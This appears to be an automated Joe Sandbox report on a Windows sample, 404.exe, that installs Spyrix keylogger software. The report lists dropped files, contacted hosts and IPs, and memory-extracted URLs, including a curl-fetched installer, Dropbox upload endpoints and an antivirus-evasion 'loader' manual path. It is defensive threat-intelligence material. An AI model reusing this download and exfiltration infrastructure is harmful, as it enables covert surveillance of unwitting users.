C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1006O.tmp	3%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-83S41.tmp	4%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-B6QNS.tmp	0%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-CJK34.tmp	3%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DN3K6.tmp	0%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-KK513.tmp	0%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PQPA7.tmp	0%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-RPIHK.tmp	0%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-S45KB.tmp	4%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	4%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	0%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)	3%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)	0%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	0%	ReversingLabs
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	4%	ReversingLabs
C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_iscrypt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\webbrowser.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	2%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
spyrix.net	4%	Virustotal	Browse
dashboard.spyrix.com	2%	Virustotal	Browse
www.google.com	0%	Virustotal	Browse
filedn.com	1%	Virustotal	Browse
cl-e0469d03.edgecdn.ru	0%	Virustotal	Browse
cdnbaynet.com	1%	Virustotal	Browse
cdn.cdndownload.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.indyproject.org/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.innosetup.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
swtb-download.spyrix-sfk.com	167.114.14.168	true	false		unknown
spyrix.net	158.69.117.119	true	false	4%, Virustotal, Browse	unknown
dashboard.spyrix.com	158.69.117.119	true	false	2%, Virustotal, Browse	unknown
www.google.com	142.250.184.228	true	false	0%, Virustotal, Browse	unknown
filedn.com	23.109.93.100	true	false	1%, Virustotal, Browse	unknown
cl-e0469d03.edgecdn.ru	95.181.182.182	true	false	0%, Virustotal, Browse	unknown
cdnbaynet.com	167.114.14.170	true	false	1%, Virustotal, Browse	unknown
cdn.cdndownload.net	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Reputation
https://Spyrix.net/dashboard/prg-list	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/Input-34212571.css	false	unknown
https://spyrix.net/dashboard/prg-actions	false	unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/index-1178777c.js	false	unknown
https://dashboard.spyrix.com/cdn.js	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js	false	unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate-fd9601a7.css	false	unknown
https://dashboard.spyrix.com/login	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Bold-765bfff4.woff2	false	unknown
https://dashboard.spyrix.com/	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/Modal-04ffda94.css	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.css	false	unknown
https://dashboard.spyrix.com/favicon.ico	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/Modal.module-d62c47b8.js	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Regular-73dcaa51.woff2	false	unknown
https://cdn.cdndownload.net/dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.jrsoftware.org/0	404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://dashboard.spyrix.com/account/login-from-program?email=	404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://api.dropbox.com/1/fileops/copy	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://dashboard.spyrix.com/account/login-from-program	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkd	curl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://spyrix.net/usr/monitor/	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://swtb-download.spyrix-s	WMIC.exe, 00000015.00000002.1767737692.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkZ	curl.exe, 00000009.00000002.1457841190.0000000002B60000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://curl.haxx.se/libcurl/c/curl_easy_setopt.html	qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	false		unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C	WMIC.exe, 00000011.00000002.1757964117.000000000296E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.spyrix.com/purchase.php?prg=sfk	spkl.exe, 00000033.00000002.3201106110.0000000000915000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044CC000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://filedn.comd	404.exe, 00000000.00000002.1648823536.00000000026A3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.indyproject.org/	spkl.exe, spkl.exe, 00000033.00000002.3244401024.0000000004541000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3190059842.0000000000863000.00000040.00000001.01000000.00000015.sdmp	false	URL Reputation: safe	unknown
https://api.dropbox.com/1/fileops/delete	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://spyrix.net/dashboard/prg-actionsC:	qrl.exe, 00000041.00000002.3109418320.0000000001180000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000041.00000002.3108663163.0000000001080000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.3127213030.0000000000D40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.dropbox.com/1/oauth/request_token	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://curl.haxx.se/docs/http-cookies.html#	qrl.exe	false		unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe	curl.exe, 0000000A.00000002.1709007892.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1709050873.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setu	WMIC.exe, 00000015.00000002.1767737692.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.spyrix.com/pro_upgrade.htm?lic=	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://spyrix.app/manual/kaspersky-loader/step1	404.exe, 0000000C.00000003.1711461284.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.3020973710.000000000215E000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3003306994.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.00000000032CE000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://spyrix.app/manual/kaspersky-loader/step2	404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://swtb-download.spyr	WMIC.exe, 00000011.00000002.1757964117.000000000296E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.certum.pl/ca.crl0:	404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://spyrix.net/dashboard/av	404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:	qrl.exe, 00000045.00000002.3127213030.0000000000D40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.cdndownload.net/proxy/list.json	404.tmp, 0000000D.00000003.2999750559.000000000330B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://curl.haxx.se/docs/copyright.htmlD	qrl.exe, 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000000.3111598222.000000000058A000.00000008.00000001.01000000.00000018.sdmp	false		unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk=	cmd.exe, 00000004.00000003.1458085591.0000000002D24000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://dashboard.actualkeylogger.com/account/login-from-program	spkl.exe	false		unknown
http://www.myspace.com/search/	spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://api.dropbox.com/1/fileops/create_folder?	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk5	curl.exe, 00000009.00000002.1457904714.0000000002BA4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1457615010.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://dashboard.spyrix.com/1	spkl.exe, 00000033.00000002.3244401024.00000000044E6000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://www.spyrix.com	spkl.exe, 00000033.00000002.3201106110.0000000000915000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	404.exe, 00000000.00000002.1648823536.0000000002692000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.spyrix.com	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://api.dropbox.com/1/oauth/access_token?SV	spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://www.innosetup.com/	404.exe, 0000000C.00000003.1712113818.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.1712556211.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000000.1713397511.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	false	URL Reputation: safe	unknown
https://spyrix.net/dashboard/proxy/upload	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk$	curl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.spyrix.com/terms-of-use.php)	404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://www.indyproject.org/Original	spkl.exe	false		unknown
http://spyrix.com/manual.php	spkl.exe	false		unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk#	cmd.exe, 00000004.00000003.1442867022.0000000002D24000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://spyrix.net/dashboard/prg-actionssfk/sfk	qrl.exe, 00000041.00000002.3110605698.0000000001570000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api-content.dropbox.com/1/files_put?	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=	404.tmp, 0000000D.00000002.3018349690.0000000002180000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3233766456.00000000031F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.dropbox.com/1/shares/dropbox	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
HTTPS://DASHBOARD.SPYRIX.COM/	spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://https://-.://%s%s%s/%s	qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	false		unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkurlrc	curl.exe, 00000009.00000002.1457841190.0000000002B68000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://dashboard.spyrix.com/.spyrix.com/	spkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://api-content.dropbox.com/1/files/dropbox	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://api.dropbox.com/1/delta	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://www.actualkeylogger.com/help.html	spkl.exe	false		unknown
https://dashboard.spyrix.com/6s	spkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://api-content.dropbox.com/1/files_put	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://www.spyrix.come	spkl.exe, 00000033.00000002.3247512604.0000000004C18000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://dashboard.spyrix.com	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://www.certum.pl/repository.0	404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://spyrix.net/dashboard/prg-	spkl.exe, 00000033.00000002.3256791035.0000000007CC5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.dropbox.com/1/oauth/request_token?	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://curl.haxx.se/docs/sslcerts.htmlcurl	qrl.exe	false		unknown
http://rc.qzone.qq.com/qzonesoso/?search	spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://spyrix.net/Uwas771wvshs7916gjqg62417/core.php	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000002.3247512604.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://spyrix.net/das	spkl.exe, 00000033.00000003.3148880064.00000000001E7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.dropbox.com/1/metadata/sandbox	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/	404.exe, 00000000.00000002.1648823536.000000000266E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://spyrix.net/usr/monitor/access.txt	404.tmp, 0000000D.00000003.2999750559.000000000330B000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://dashboard.clevercontrol.com/account/user-hash-gen	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://www.actualkeylogger.com/help.html#registrate	spkl.exe	false		unknown
http://www.ok.ru/dk?st.cmd=searchResult	spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://repository.certum.pl/l3.cer0	404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://api.dropbox.com/1/fileops/create_folder	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://html4/loose.dtd	qrl.exe, qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	false		unknown
https://api.dropbox.com/1/oauth/access_token	spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0	curl.exe, 0000000A.00000002.1709007892.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1709050873.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.certum.pl0.	404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	404.exe, 0000000C.00000000.1710941911.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
167.114.14.168	swtb-download.spyrix-sfk.com	Canada	16276	OVHFR	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
158.69.117.119	spyrix.net	Canada	16276	OVHFR	false
167.114.14.170	cdnbaynet.com	Canada	16276	OVHFR	false
95.181.182.182	cl-e0469d03.edgecdn.ru	Russian Federation	200557	REGION40RU	false
142.250.184.228	www.google.com	United States	15169	GOOGLEUS	false
23.109.93.100	filedn.com	Netherlands	7979	SERVERS-COMUS	false

Private

IP
192.168.2.7
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523866
Start date and time:	2024-10-02 06:24:22 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	86
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	404.exe
Detection:	MAL
Classification:	mal52.troj.evad.winEXE@142/1037@15/9
EGA Information:	Successful, ratio: 60%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.19.126.163, 199.232.210.172, 172.217.18.3, 216.58.206.46, 66.102.1.84, 34.104.35.123, 142.250.185.136, 172.217.16.200, 142.250.185.170, 142.250.186.170, 142.250.186.42, 142.250.181.234, 142.250.185.74, 172.217.18.10, 142.250.186.106, 142.250.184.202, 172.217.16.202, 142.250.184.234, 142.250.185.234, 142.250.186.74, 216.58.206.42, 142.250.185.138, 142.250.185.202, 142.250.185.106
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, slscr.update.microsoft.com, www.googletagmanager.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target qrl.exe, PID 4008 because there are no executed function
Execution Graph export aborted for target qrl.exe, PID 6208 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:56:10	API Interceptor	16x Sleep call for process: 404.exe modified

LLM Input / Output

Input	Output
URL: https://dashboard.spyrix.com/login Model: jbxai	{ "brand":[], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"Login", "text_input_field_labels":["Email", "Password"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://dashboard.spyrix.com/login Model: jbxai	{ "phishing_score":null, "brands":"unknown", "legit_domain":null, "classification":null, "reasons":null, "brand_matches":[], "url_match":false}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
167.114.14.168	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse
	sfk.exe	Get hash	malicious	Unknown	Browse
	sfk.exe	Get hash	malicious	Unknown	Browse
239.255.255.250	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	http://loglnmicrosoftonl365.Globalfoundries.vitoriorefrigeracao.com.br/excel/active/test@globalfoundries.com	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	http://lamourskinclinic.com.au	Get hash	malicious	Unknown	Browse
	https://unpaidrefund.top/view/mygov	Get hash	malicious	HTMLPhisher	Browse
158.69.117.119	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse
158.69.117.119	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse
167.114.14.170	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse
	s14.bat	Get hash	malicious	Unknown	Browse
	s200.bat	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
swtb-download.spyrix-sfk.com	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	167.114.14.168
swtb-download.spyrix-sfk.com	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	167.114.14.168
filedn.com	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	23.109.93.100
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	23.109.93.100
	word.exe	Get hash	malicious	GuLoader	Browse	74.120.9.25
	964232908.eml	Get hash	malicious	MeshAgent	Browse	23.109.93.100
	http://filedn.com	Get hash	malicious	Unknown	Browse	23.109.93.100
	Kh25PMA7u8.exe	Get hash	malicious	Unknown	Browse	23.109.93.100
